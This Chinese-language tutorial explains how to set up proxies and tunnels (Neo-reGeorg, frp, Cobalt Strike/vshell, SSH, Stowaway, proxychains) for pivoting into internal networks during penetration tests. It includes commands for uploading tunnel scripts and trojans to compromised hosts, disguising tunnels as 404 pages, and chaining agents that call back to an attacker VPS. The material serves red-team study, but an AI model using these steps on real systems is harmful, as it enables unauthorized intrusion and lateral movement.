内网渗透过程的多种代理搭建方法

在渗透的时候或多或少都会遇到各种不同的内网环境
因此我们拿下目标的外网资产后除了隐蔽自己外还有一个重要的步骤就是搭建内网代理，用外围机器作为跳板去攻击内网其他靶机

1.Neo-reGeorg

reGeorg是一个老牌搭建内网代理的工具了，至此ASP、PHP、JSP多种语言，由于很早就停更了所以现在很多服务器可能都不兼容。

而Neo-reGeorg作为他的现代重构版本功能更加强大，兼容性更强同时隐蔽性也更强

使用也很简单，下载后运行python脚本
python neoreg.py generate -k password(password是你的连接密码)
即可在neoreg_servers文件夹下生成一堆搭建代理用的脚本，上传带目标服务器即可
然后使用python313 neoreg.py -k password -u http://127.0.0.1/tunnel.php连接即可

看到这个就说明代理运行成功，你只需要连接127.0.0.1：1080即可
除此之外还有很多进阶用法，比如伪装404页面

python neoreg.py generate -k <you_password> --file 404.html --httpcode 404
需要特定cookie或者认证
python neoreg.py -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"
还有端口转发等
python neoreg.py -k <you_password> -u <url> -t <ip:port>

2.frp

frp也是一个老牌搭建代理的工具了，虽然被制作的初衷不是用于渗透的
但得益于其强大简单易用的特性，被广泛用于内网渗透
代理类型多样，支持平台多

文件下载后会有两个可执行文件，frps和frpc
s代表server服务端，c代表client客户端。对应的toml就是他们的配置文件
frps的配置大概是这样的

[common]
bind_port = 7000
dashboard_port = 7500
token = 12345678
dashboard_user = admin
dashboard_pwd = admin
vhost_http_port = 10080
vhost_https_port = 10443

如果没有必要，端口均可使用默认值，token、user和password项请自行>设置。

“bind_port”表示用于客户端和服务端连接的端口，这个端口号我们之后在配置客户端的时候要用到。

“dashboard_port”是服务端仪表板的端口，若使用7500端口，在配置完成服务启动后可以通过浏览器访问 x.x.x.x:7500 （其中x.x.x.x为VPS的IP）查看frp服务运行信息。

“token”是用于客户端和服务端连接的口令，请自行设置并记录，稍后会用到。

“dashboard_user”和“dashboard_pwd”表示打开仪表板页面登录的用户名和密码，自行设置即可。

“vhost_http_port”和“vhost_https_port”用于反向代理HTTP主机时使用，本文不涉及HTTP协议，因而照抄或者删除这两条均可。
然后./frps -c frps.ini即可运行服务端

然后就是我们client设置

[common]
server_addr = ip  #服务器的地址
server_port = 7000  #服务器监听的端口号
tls_enable = ture  #启用tls加密连接[plugin socks]
type = tcp  #指定协议类型为tcp
plugin = socks5  #使用的插件为socks5
remote_port = 46075  #指定socks5代理的远程端口
use_encryption = true
use_compression = true

但是有个缺点就是如果配置文件被发现有可能暴露自己的VPS地址

3.Cobalt Strike或者vshell自带的内网搭建

这个就比较简单了
直接上传远控木马选择隧道代理!（vshell，cs同理）

选择服务端端口后直接连接即可

4.ssh命令搭建ssh隧道

(参考https://fushuling.com/index.php/2023/09/21/%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86%e6%90%ad%e5%bb%ba/)
这种比较偷懒适合临时使用

ssh -L 8085:172.2.136.5:80 ctfshow@pwn.challenge.ctf.show -p 28227
这里我们将可控linux服务器中172.2.136.5:80的流量转发到本地windows的8085端口上，然后就可以通过访问127.0.0.1:8085以访问172.2.136.5的web服务

5.Stowaway

也是一个老牌代理软件了，专门为红队渗透而生

Stowaway一共包含两种角色，分别是：

admin 渗透测试者使用的主控端
agent 渗透测试者部署的被控端

快速启动
以下命令可以快速启动最简单的stowaway实例

admin: ./stowaway_admin -l 9999
agent: ./stowaway_agent -c <stowaway_admin's IP>:9999
同时可以使用-s参数指定密码
然后指定使用哪个代理以及指定端口

stowaway多重代理搭建
(https://www.cnblogs.com/sec-geek/articles/19027695)

首先攻击者
服务器admin端: ./stowaway_admin -l 9999 -s 123
admin端监听9999端口，连接密码为123

先拿下主机1的入口机器的webshell，把它作为agent-1端

然后
agent-1端: ./stowaway_agent -c vps公网ip:9999 -s 123 --reconnect 8

agent-1端连接我的admin端的kali的9999端口,并设置重连间隔时间，当控制端掉线时客户端每隔8s重连控制

admin端点：
use 0 #进入刚刚拿下的会话
socks 7777 admin admin #建立socks代理，端口为7777，账号密码为admin、admin

此时可以通过通过proxifier连接控制端，访问第一层内网
然后
拿下（sql）192.168.2.22这台机器的webshell，然后上传agent-2
admin端的（node 0）开个监听

use 0
listen #监听
10000 #监听端口为10000

通过webshell，让(sql)机器主动连接 （web）机器 的10000端口
./stowaway_agent -c 192.168.2.11:10000 -s 123 --reconnect 8
此时控制端会立即显示新加入的节点 (node 1)

进入新的节点 （node 1）

admin端：
use 1
socks 7778 admin admin 建立socks代理

此时proxifier再添加代理服务器和代理规则即可访问第二层网路3.x
以此类推拿下三层内网

连接代理连接软件

1.linux

linux使用代理软件稍微比较麻烦这里写三个办法

1./etc/environment

可以通过编辑environment文件实现全局代理比较简单方便

http_proxy="http://1.2.3.4:6005"
https_proxy="http://1.2.3.4:6005"
ftp_proxy="http://1.2.3.4:6005"
no_proxy="localhost,127.0.0.1,192.168.0.0/16,10.0.0.0/8"

然后source /etc/environment激活一下
但是很多渗透工具默认不走他的代理所以基本没啥用，一些常见的命令如curl貌似会走

2.proxychains

也是一个老牌代理软件了

apt-get install proxychains
vim /etc/proxychains.conf

然后编辑

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4    127.0.0.1 9050# example
socks5  127.0.0.1 8888

然后使用
proxychains+命令 来运行
代理类型 代理ip 的格式来添加代理
但是有些golang写的程序貌似不走他的代理

3.clash tun模式

这个时兼容最好的一个方法可以说是可以实现真正的全局代理
这里就贴大佬的连接，不再赘述
https://fushuling.com/index.php/2024/12/29/linux下设置全局代理/

windows

Windows没什么好说的
就一个Proxifier可以满足几乎所有需求了
（Proxifier还是太权威了xd）
这里推荐一个吾爱大佬的单文件版本
https://www.52pojie.cn/thread-2074677-1-1.html